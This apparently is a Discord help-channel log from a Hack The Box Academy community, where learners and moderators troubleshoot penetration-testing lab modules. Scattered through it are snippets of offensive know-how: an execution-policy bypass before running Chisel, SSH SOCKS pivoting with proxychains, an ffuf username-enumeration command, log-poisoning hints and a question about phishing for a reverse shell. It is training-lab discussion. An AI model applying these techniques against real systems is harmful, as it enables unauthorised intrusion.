My answers are:
Fiber optic cable
Optical fiber

And Still wrong

Anyone could give advice regarding this?
Thank you!

fathom pendant
#

Also drop the word cable

#

Its in the reading as well as a hyphenated word

fathom pendant
#

@novel valve dont spoil modules above tier 0

novel valve
#

oh sry

#

where can i then ask ?

grizzled iron
fathom pendant
opaque cliff
#

Hi

#

How can I become a hacker?

fathom pendant
compact patrolBOT
fathom pendant
#

@opaque cliff ^

novel valve
#

Can anyone help me ? i'm stuck in the "Limited File Upload" Module and i dont get the right result with xxe.

fathom pendant
opaque cliff
novel valve
fathom pendant
fathom pendant
grizzled iron
opaque cliff
fathom pendant
novel valve
fathom pendant
waxen totem
#

@tight gulch that's illegal, please familiarize yourself with the #rules

last musk
fathom pendant
last musk
#

cant use ps remote

#

on the machine

fathom pendant
#

But you may be able to do Set-ExecutionPolicy -scope process bypass before running Chisel

last musk
echo marsh
#

if you haven't figured this out already, it wants you to use the input from the given example above. this entire section definitely needs to be rewritten with clearer explanations and question

forest tendon
#

Not able to spawn an instance while doing the AD module because i'm getting a prompt saying there are no instances available

river field
fathom pendant
forest tendon
#

the latency is extremely high for every available region

#

like 100000ms

#

i'm trying to spawn a pwnbox instance

fathom pendant
#

Sounds like a network issue

forest tendon
#

this has never happened before , any solutions?

fathom pendant
#

Restart your router

forest tendon
#

i was actually using WARP so it might have increased the latency i just switched it off and now it's working thanks!

reef axle
#

As the new update for CBBH -> CWSE will remove some modules for example hacking wordpress, will they remain achievable, are they just removed from the path or enitrely from HTB

rich obsidian
#

A PowerShell question here, pertaining to File Transfers. Are the asynchronous download options provided in the content because it would be an ideal practice to use an asynchronous download operation on something like a webserver so that there would be no interference with regular operations? I know it is a non-blocking operation for the thread, but what thread exactly are they talking about? Would the OS not schedule my cmdlet either way?

dark hedge
#

i would ask support for a concrete answer however

reef axle
#

okay

fathom pendant
frosty ferry
#

i enter it correctly its saying wrong

limber fog
frosty ferry
#

no space

fathom pendant
#

Refresh page and try again

#

Also please dont share screenshots that may reveal answers :)

frosty ferry
#

sorry mb

frosty ferry
rotund sphinx
#

are you sure that is the correct flag? some of the environments contain multiple flags but only 1 of them is correct for the question

frosty ferry
#

i am pretty sure this is the only flag

fathom pendant
#

@limber fog im 99% certain the CDATA method isnt possible in that section

frosty ferry
#

tried everything still wrong

#

worked

granite canopy
#

Is anyone available to help me with Windows Lateral Movement. Windows Remote Management: Q3?

I was able to authenticate as Helen on DC previously.

tawny maple
#

is there any new updated info on "Nibbles" as everything is 4 years old and not really helpful imo.

gray yacht
fathom pendant
#

So old stuff should still be relevant

limber fog
tawny maple
fathom pendant
#

Are you referring to the sections in the "getting started" module or the retired machine itself

limber fog
#

I was talking abt that section

tawny maple
fathom pendant
wheat quest
#

Hey guys, i just kinda finished starting point machines.

fathom pendant
wheat quest
#

So I'm kinda very new

tawny maple
#

like i upload the .php and get the errors, can log in and all but once they start throwing random stuff out and skipping steps is what confuses me

wheat quest
#

Please help me out, how do I get better? I am struggling with easy web machines 🥲

tawny maple
compact patrolBOT
fathom pendant
fathom pendant
#

Also this isnt #general, if you read and follow #welcome instructions youll be able to access more of the server

#

There's some basic web modules in htb academy which might be useful to cover some basics for foothold

wheat quest
# wheat quest Yes

I am Computer Science graduate, currently an Application security intern

#

So I have a good hold on fundamentals... But I get slapped when it comes to understanding code and figuring out exploits

fathom pendant
wheat quest
fathom pendant
vestal venture
#

Cybersecurity roadmap for beginners?

tawny maple
#

this support is garbage, ill just figure it out myself. hes a glorified bot spouting one word replies. yikes

fathom pendant
#

A common problem ive seen in the getting started module is people not replacing the placeholder ip in the example php command

agile obsidian
#

Hey guys

#

I'm new here

fathom pendant
rich obsidian
wheat quest
rich obsidian
wheat quest
#

I think what I'm lacking is ... Being able to read documentations and figuring out stuff with just "google"

I was thinking ill be good to go with that

fathom pendant
#

i dont take it personally tbh ¯_(ツ)_/¯

wheat quest
rich obsidian
rich obsidian
fathom pendant
rich obsidian
fathom pendant
#

Also let's try and keep this channel on topic 😉

wheat quest
#

But yh, being able to understand online documents and CVE's is my next step.

ChatGpt said it, he's cool at times.

rich obsidian
#

sometimes you cant get an answer at all even from google unless you know what to ask

fathom pendant
#

Keywords are what really matter

rich obsidian
wheat quest
#

How long would it take me to be able to pwn new machines and rank up? Atleast upto medium difficulty.

Just asking so that I don't over expect from myself. Haha.

rich obsidian
fathom pendant
rich obsidian
#

but she is right, this is off topic

fathom pendant
#

Easy now is around hard from 4 years ago due to skill floor difference

wheat quest
#

I don't care if it takes me an year tbh, I've all the time - I'm still young hahaha

compact patrolBOT
fathom pendant
rich obsidian
#

expecially since you have a foundation in CS. That is what really helped me get a leg up in this.

#

You will however be lacking in networking fundamentals unless that was in your curriculum for some reason

#

and OS stuff too

wheat quest
#

Yh, I didn't feel lost in starting point machines at all (except that I had to understand windows internals 😑).

#

Got humbled when I started new machines

wheat quest
rich obsidian
#

acadamy has two modules that would be great for you, windows fundamentals and linux fundaments (if you don't already know a decent amount about linux)

#

Those two will be your bread and butter, so surface level knowledge really won't cut it

wheat quest
#

Previously I used Arch

rich obsidian
#

I use arch btw lol, but no seriously youre on a good start. dont get discouraged, hacking is its own game too. Treat it like you were having to learn conditional statements and for loops again. It will compound

wheat quest
rich obsidian
#

I need to install pyftpdlib for the File Transfer module. The install instruction recommend pip3, I know best practice is typically pipx but since this is a library and not a command line utility, should I just use pip3? I can't think of any way that it would negatively impact my environment beyound accupying disk space

lament oak
#

I don't know if its just me but this password attacks skill assessment is literally killing me. I did like 75% of this module before it was updated (left it midway and moved onto others) completed everything upto attacking common applications including AD but man this is too hard for me. Is there anything that I should learn before trying to do this skill assessment. I'm totally lost.

fair charm
#

anyone got a updated writeup for the password attacks module

cloud urchin
fair charm
#

oh ok

summer lava
#

Hello Everyone

Walking through CPTS path - let's do this together with and as a team -

One of us in Windows Privilege Escalation - if you here as well, never hesitate to DM

reef axle
#

hello all, I'm Facing an issue in File Inclusion -> Server Log poisoning, i manipulate the User-Agent header and see the output contianing the CMD or any other string i give, however again when i try to /var/log/apache2/access.og&cmd=id or any other command it gives me the blank page

#

what am i doing wrong

fiery trench
#

Anyone available to lend a hand with Introduction to Deserialization Attacks Skill Assessment 2?
I managed to get the first question and I'm able to obtain the admin cookie, but I'm stuck on the second question in regards to the PHP Gadget. I'm pretty sure I have the right version but the server is not executing my code.

acoustic owl
reef axle
#

maybe the log file is kept destroying

unique drum
#

Hey I need help in solving HTB lab..I got stuck... I have access of mail account of client X . Now I want to do phishing attack on client Y . Client Y only click the link sent by client X. How to get reverse shell of client Y ?? Can anyone help me ?? Expert please

acoustic owl
acoustic owl
acoustic briar
#

Hi, did you find a solution for this? I'm running into the same problem...

reef axle
#

I got the flag, bascially the issue was if i send mutiple requests in repeater (3-4 times) it crashes it or deletes the log file, so carefully trying it gave me the flga.

#

although i was using single quote.

reef axle
fathom pendant
acoustic owl
fathom pendant
#

or reading the log carefully, imo it was far easier for me to review in view-source mode rather than the formatted page view

#

ah yeah

heady sapphire
#

Hello ! I am in password attacks - pass the ticket module and when I try to solve it using my local Kali vm I get a lot and I mean a lot dependencies issues with the tools etc. also when I somehow managed to fix them I get error from the target domain that the time is not the same as mine but I don’t know a way to find out the domains time

fathom pendant
#

once to set the poison twice to activate

heady sapphire
fathom pendant
#

there's a command somewhere in this chat that has the syntax i'm sure if you search this chat for 'faketime' you'll find it

fathom pendant
#

ntpdate*

#

not update

#

all i did was search 'faketime' and it was a few messages down

#

i just forwarded the first relevant one ¯_(ツ)_/¯

#

lol i've never needed it so i don't have the syntax offhand

pulsar rapids
#

What's does blood means?

#

Like pertaining to boxes and cyber security

#

Are those the only things you can get from hacking into a box?

#

Yeah

fathom pendant
#

i've never had to do it kek i've gotten lucky (I'm in the US, and i've never had a clock skew error, just lucky ig)

heady sapphire
#

So where it says command where what am I supposed to write ?

fathom pendant
fathom pendant
heady sapphire
#

And it is going to run ias If I had the same date as the target ?

fathom pendant
#

yes

heady sapphire
#

Also in this module I get too many dependencies errors that htb does not mention . Is that normal ? I use latest version of Kali

fathom pendant
#

make sure your kali is fully updated

#

sudo apt update && sudo apt upgrade

#

then restart the vm

heady sapphire
#

It is updated indeed

#

The most problems are with python packages

acoustic owl
swift dove
wheat silo
#

Hey i'm working on the attacking DNS section in Attacking common services, the question tells you to use subbrute and I used the exact commands that it said in the module but the program is running into a list index out of range error. The section only put "ns1.inlanefreight.htb" in the resolvers.txt file and I did the same so I'm not sure why the result is different. I also made sure to add inlanefreight.htb to my /etc/hosts file just in case that was needed. Does anyone know how to get this command to work? ./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt

acoustic briar
fathom pendant
#

you'd need to add ns1.inlanefreight.htb to your hosts file as well btw

#

if you're not using the ip*

somber bison
#

how do i read the contents of flag.txt in metasploit module “use the metasploit franework to exploit the target with eternalromance. find the flag.txt file on administrators desktop and submit the contents ss the answer”

#

I’m in the shell right now

fathom pendant
#

:)

#

(administrator is a user on Windows machines much like root on linux)

somber bison
#

I am assuming i have to look through the cheatsheet

wheat silo
fathom pendant
#

(also the ip for the ns1.inlanefreight.htb ns would be the ip of the target, if it's even configured)

somber bison
#

do i have to restart the process

fathom pendant
#

go to C:/Users/Administrator

#

you should be NT Authority/System yeah?

#

if you do whoami

somber bison
fathom pendant
#

then you can access anywhere on the system

somber bison
#

\

fathom pendant
#

if you're unsure of navigation within a windows environment, there's a windows fundamentals module and intro to windows CLI module

somber bison
#

oh i did it

#

heeeeeeeeeey im in admin now

fathom pendant
#

the question tells you exactly where to look forit

wheat silo
fathom pendant
#

have patience atp

#

just let it run for a few minutes and you may receive some information

wheat silo
#

gotchu thanks

fathom pendant
#

also it's best to use http://inlanefreight.htb not the ip for subbrute iirc

#

./subbrute.py <hostname> -s ./names.txt -r ./resolvers.txt

somber bison
#

Is my computer slow or is this web vm slow

fathom pendant
#

well ensuring you did everything right is step 1

somber bison
#

Dude..

#

Marcie?

#

Modes? Falcon?

#

@modes

swift dove
fathom pendant
fathom pendant
#

@bold wing this isn't a hacker for hire server, i suggest you read the #rules

bold wing
#

@fathom pendant sry, was unable to find the right place. Somebody directed me here

fathom pendant
#

I don't know any server that is for what you're asking for. Not only that we cannot verify any bit of information that you give us as truthful

bold wing
#

@fathom pendant sure, i see your point. Thanks for clarification

somber bison
#

I’m confused on why every hacking tutorial/course for metasploit is based off of the eternalblue mdoule

wheat silo
#

Wait if i'm letting it run but these errors are still popping up should I keep waiting? @fathom pendant

fathom pendant
#

yeah i forgot the syntax for this doesn't use the protocol specification

#

(this is shown in the reading as well)

wheat silo
devout lily
#

Hi everyone, i got some questions. The first one is why i have 4 interfaces with the same IP (is it possible that it happened now when i connected my pc via ethernet?), the second one is why the academy target host is down, however if i run ping <ip> it works sometimes

fathom pendant
fathom pendant
#

sudo killall openvpn

#

tl;dr the openvpn pack uses a static ip-addressing schema, not dynamic

devout lily
fathom pendant
devout lily
fathom pendant
devout lily
fathom pendant
#

so it's easier to kill all, then move forward

fathom pendant
zinc wigeon
#

Hello, am in Intro to Assembly Language and am stuck on final exercises. Anyone can give me a hint with this?

fathom pendant
#

@wheat silo spawned a fresh target; only thing i have in the resolvers file is ip, ran the command as shown in the example, got the expected results no errors

wheat silo
cloud urchin
#

@teal arrow Please take care not to post content from modules above tier 0, especially skill assessments

teal arrow
fathom pendant
#

as a note, spoilering an image really doesn't do much of anything. As anyone can still click on it.

cloud urchin
#

the explanation inside the module is content from the module as well

teal arrow
#

Oh yeah you're right I see what path you're talking about. Were you able to look at the different outputs though, do you know if I'm doing anything wrong?

deep pier
#

Is there any modules that are free to learn networks etc

devout lily
#

The first image is the output from the wget command executed on the reverse shell with the target, and the second one is the outpu from the server in listening. Can anyone explain me why the permission is denied?

#

I got the LinEnum.sh file in the same directory where the server is running on

gray yacht
devout lily
gray yacht
devout lily
#

which part of the output says this?

gray yacht
atomic shoal
#

Hi guys i have a problem Fileupload whitlist filter i get the valid extension then after i send it and try to excute it response with 404 and on of them give me 403

devout lily
#

sorry for the bad english

gray yacht
gray yacht
devout lily
# gray yacht

if i read "Cannot write to <file_name>", for me it sounds like "Hey, you cannot write nothing in this file"

atomic shoal
#

@gray yacht can you help me

devout lily
#

the exercise

gray yacht
gray yacht
gray yacht
atomic shoal
#

it give me 403 when i try to access the file

gray yacht
raw bridge
#

Hello

gray yacht
rustic sage
#

Escalate the privileges on the target and obtain the flag.txt in the root directory. Submit the contents as the answer.

#

solved

gray leaf
#

Doing the Attacking WPA/WPA2 Module and I'm on the PMKID chapter doing the 2nd exercise "Perform the PMKID capture as demonstrated in this section. What is the discovered value of the WPA PSK? "

I ran the attack and generated the hash, but it's been nearly a half hour with no results. I'm just using rockyou.txt on my own machine. These exercises haven't taken this long before so just wanted to check and see if I'm maybe using the wrong worldlist or something?

harsh sundial
#

hey i wanna check for availaible users on a smtp server. i can do the vrfy command are there easy ways to bruteforce this or find available user because i am trying it with a personal bash script but making it is not going smoothly and seems inefficient ?

fathom pendant
harsh sundial
fathom pendant
#

yep

harsh sundial
#

i am curious how they work because i get kicked out because i have to many errors so i might need to look that up haha

fathom pendant
harsh sundial
#

oh so a different connection per user they try ?

fathom pendant
#

basically

#

(there's some multi-threading involved, but we don't worry about that)

harsh sundial
#

oh okay thank you
also thank you pb
i like making some tools of my own so i might try that later down the line

harsh sundial
#

okay so i tried the metasploit tool but i can't seem to find any user i have tried on my own machine and on the pawnbox
any clues on what i am doing wrong ?

shut wraith
#

Sliver Module

spawndll for generated dll beacon and execute-assembly for beacon binary did not work for beacon establishment from within session
only uploading and "execute" worked
Can help?

fathom pendant
harsh sundial
#

both get no results

fathom pendant
harsh sundial
fathom pendant
harsh sundial
#

ah okay i will try it haha

fathom pendant
harsh sundial
#

yes thank you i found it trying em out as we speak

#

still says that the module is completed but he doesn't give me any other output

fathom pendant
#

Try with the smtp-user-enum tool (the wait time should be > 15 at least

white tangle
#

Hi

harsh sundial
#

so not via metasploit u mean ?
i am so confused because i googled a write up and the name is in the wordlist haha

soft moon
#

ahh rockyou.txt will be your friend unless it takes forever, thus so many alarms were raised

fast shoal
#

Hey where do we report a problem in a machine?

cloud urchin
fast shoal
#

It was an htb machine but it's ok. I didn't had the reflex to add a DNS enter in /etc/hosts for the website because it ain't a public website

shut wraith
#

Common error

jade glen
#

You should use twitter literally there are many good folks :v

cloud urchin
#

Hi, welcome. Please read the #rules and follow the instructions in #welcome, then you can post in #general for questions like this. This channel is dedicated for modules on Academy.

vernal tapir
#

I personally like to use aquatone as it's quick and easy

steep canyon
#

Looking for a nudge on Password Attacks Skills Assesment; I've got creds for j* on (172...13)/ user: d on (172...7 & 10). Cannot seem to make any progress further. Are we somehow supposed to rdp or xfreerdp on to 172..*.7 (10) or 11??

vernal tapir
steep canyon
#

i've used ligolo-ng to pivot to each, the particular one i am trying to get on right now is jump01

#

I can't seem to rdp into anything, no evilwinrm, psexec etc

hollow kernel
#

I finished Password attacks module thanks for help here!

vernal tapir
hollow kernel
hollow kernel
steep canyon
#

yea, so i have the next access, but rdp will not work. I have creds to rdp into FILE01 and JUMP01

#

rdp keeps erroring out

hollow kernel
#

What error do You get?

steep canyon
#

One sec [21:20:21:167] [259243:259244] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 0: Success [21:20:21:167] [259243:259244] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] [21:20:21:722] [259243:259244] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 0: Success [21:20:21:722] [259243:259244] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] [21:20:21:722] [259243:259244] [ERROR][com.freerdp.core] - freerdp_post_connect failed

vernal tapir
#

and did you add the hosts into your /etc/hosts?

steep canyon
#

I've tried proxychains with SSH pivot... that was an utter failure. I forgot to add to /etc/hosts ... >.<

vernal tapir
#

ssh -D 9050 to establish a SOCKS proxy, proxychains xfreerdp for windows hosts

#

But yeah, the hosts file is very important

steep canyon
#

so ligolo-ng wont allow free rdp?

#

I have to do socks?

hollow kernel
#

Try with domain\user or put username an then domain and pasword

steep canyon
#

just got into jump01 with proxychains... thank you

hollow kernel
vernal tapir
#

Glad you got it !

steep canyon
static slate
#

describe it better, what all you’ve tried and someone might be able to help you

thin dew
#

Hey guys! I'm stuck on the Password Attacks Skills Assessment and was wondering if anyone can give me a nudge!

I have creds for the fi* user and RDPed into the WIN-HARD machine. There, I found hashes for the db but I'm not able to crack them nor pass them to gain a futher foothold. Would appreciate it if anyone can help me how to go forward! Thanks

fathom pendant
#

@zinc wigeon intro to asm is above tier 0

fathom pendant
# zinc wigeon wdym

It means don't post snippets or anything of your code for the skill assessment, as thats spoiling information for modules above tier 0

#

[See channel info]

zinc wigeon
#

oh, mb

#

sry

slate palm
#

I belive there is a problem in the machine of blind sql injection module, the time-based section. When I turn on the machine and access the ip, it only shows the machine of the boolean-based sql injection?

fathom pendant
slate palm
fathom pendant
#

Also idk why they have the uri being view-source

slate palm
left needle
#

Hi, I wanted to know that if I am unable to perform zone transfer the next step is to perform bruteforcing ? Do I need to bruteforce NAMESERVER as well ?

For example :- dnsenum bruteforce on ns.inlanefreight.htb ?

steel hazel
#

Hi, i'm new to all this stuff, i wanted to know if there was any way of getting cubes without paying

narrow crest
#

hi

worldly rover
steel hazel
#

I dont have friends

hazy grotto
worldly rover
#

Social engineer some friends.

steel hazel
#

Like ye i have them is just that nobody wants to learn this

worldly rover
#

Social engineer them into wanting to learn cybersec

lapis plinth
#

good idea bro

hazy grotto
#

Try doing free hackme to get better. Join their discord and hang out with people in the voice chat. Do some boxes with people. Impress them and convince them HTB was your reason for being good. Get the invite.

worldly rover
lapis plinth
#

sure it isKappa

soft moon
slender wagon
#

Hi I'm a beginner in thehackthebox I search for team to develop my skills

dry falcon
#

module Attacking Common Applications - Attacking Thick Client Applications

i run this 191E bat file and it don't create any file in c:\programdata\.
we wait a few minutes to spot the oracle.txt file which contains another file full of base64 lines, and the script monta.ps1 which contains the following content, under the directory c:\programdata.

soft moon
dry falcon
soft moon
#

cant it wont allow even when I copied and paste the password...

soft moon
dry falcon
dry falcon
sterile solstice
#

hey everyone. I am doing Wi-Fi Penetration Testing Basics , Skills assessment. I have ||started airdump-ng and done a deauth attack, getting the handshake but the capture isn't producing a PCAP. What am I doing wrong?||

sterile solstice
tacit flint
#

Hi .. im new to htb and started linux fundementals ... but i cant use any browser or install any vpn due to network issues inside linux .. but pinging sites and their ip works .. curl v4 test fails .. i need help

sterile solstice
#

if you can ping, then you have a connection

#

what do you mean by you cant use your browser?

#

and you don't need to install a vpn. you use openvpn with the downloaded *.ovpn files

quaint marsh
#

Hello everyone, I need help with Broken authentication module

sterile solstice
#

ask the question mate

tacit flint
quaint marsh
#

It's the enumerating usernames section. I am using this command but no help i can't find the username. Am I doing something wrong? ffuf -w /home/neo/Wordlists/SecLists/Passwords/Common-Credentials/xato-net-10-million-passwords.txt -u http://94.237.61.242:34580 -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user" -t 40

sterile solstice
#

so you can open up your browser. so its not the browser. can you reach google.com or other company sites?

tacit flint
#

no i cant reach any sites .. the browser open ups , but whenever i try to reach a site , eg discord.com , it says my connection timed out

sterile solstice
#

first thing is youre using passwords to fuzz a username?